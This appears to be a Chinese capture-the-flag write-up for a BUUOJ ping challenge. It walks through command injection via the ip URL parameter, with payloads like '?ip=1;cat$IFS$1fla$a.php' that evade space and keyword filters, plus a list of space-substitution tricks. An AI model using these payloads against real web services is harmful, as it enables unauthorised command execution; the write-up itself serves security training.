题目地址：https://buuoj.cn/challenges

解题思路

第一步：进入题目，让我们进行ping测试，猜想是利用’|‘或者’;'符号执行其他非ping命令。

第二步：在URL构造?ip=1;ls查看提示

第三步：使用cat命令查看flag.php

1. 在URL一栏构造?ip=1;cat flag.php发现空格被拦截
   

2. 使用${IFS}替换空格发现符号被拦截
   

3. 使用$IFS$1代替空格发现flag字符被拦截

4. 使用变量拼接，输入?ip=1;a=g;cat$IFS$1fla$a.php,发现没有提示信息，按f12，看到flag
   

替换空格方法

1. ${IFS}替换
2. $IFS$1替换
3. ${IFS替换
4. %20替换
5. <和<>重定向符替换
6. %09替换